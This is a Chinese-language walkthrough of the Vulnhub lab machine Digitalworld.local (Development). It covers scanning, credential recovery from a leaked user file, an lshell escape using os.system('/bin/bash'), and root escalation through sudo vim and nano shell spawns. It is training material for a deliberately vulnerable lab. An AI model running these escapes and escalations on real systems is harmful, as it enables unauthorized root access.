Vulnhub:Digitalworld.local (Development)靶机
kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130
查看网站首页源码
访问development目录,提示存在一个流量包
查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php
访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错
根据报错搜索关键字
在exp中提示通过访问slog_users.txt获取敏感信息
md5解密
intern | 12345678900987654321
patrick | P@ssw0rd25
qiu | qiu
使用intern用户登录目标
lshell绕过
echo os.system('/bin/bash')
提权
使用之前得到的密码,切换到patrick用户查看sudo权限
vim提权
提权方法:vim | GTFOBins
sudo -u root vim -c ':!/bin/bash'
nano提权
提权方法:nano | GTFOBins
sudo -u root nano
^R^X
reset; sh 1>&0 2>&0
运行nano后,键盘ctrl+r
ctrl+x
输入命令:reset; sh 1>&0 2>&0,后回车
Vulnhub:Digitalworld.local (Development)靶机相关推荐
- Vulnhub:Digitalworld.local (Mercy v2)靶机
kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
- vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...
- vulnhub:THOTH TECH:1靶机
一.信息收集 扫描主机 扫描端口 访问80端口,apache页面 二.信息利用 尝试访问21端口,试试弱口令 发现可以登录anonymous匿名访问 有个note.txt文件,下载文件: 提示:用户名 ...
- 靶机渗透练习56-digitalworld.local:TORMENT
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil ...
- 靶机渗透练习53-digitalworld.local:BRAVERY
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hope ...
- 靶机渗透练习58-digitalworld.local:VENGEANCE
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us ...
- Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
最新文章
- 设置CentOS 6.6系统默认的语言为中文
- 【题解】 HDU 2570 迷瘴
- 【转】从源码分析PreparedStatement是如何防止SQL注入的?
- 独家下载!Java工程师成神必备宝典
- 为什么这个SQL Server DBA学习PowerShell--SQL任务
- 创建oracle 数据库表空间,角色,用户的sql语句
- 3 二分频verilog与Systemverilog编码
- nginx 逻辑运算
- Python利用情感词典做情感分析
- python分布式定时任务_分布式定时任务框架——python定时任务框架APScheduler扩展...
- 狄拉克量子力学原理【1】态叠加原理
- redis的lpush、rpush、rpop、lpop位置的简单理解
- 计蒜客1185出书最多
- 音频处理——音频编码原理简介
- 圣诞节计算机音乐,圣诞节的背景音乐
- android日历订阅,Android日历.
- 【原创】QT5-卸载精灵v1.0-卸载windows软件-简易版
- 用python读取dat文件,wifi数据采集工具csi tool数据文件(.dat文件)解析
- Mysql You can‘t specify target table ‘表名‘ for update in FROM clause错误解决方案
- 军工企业信息化与信息安全概要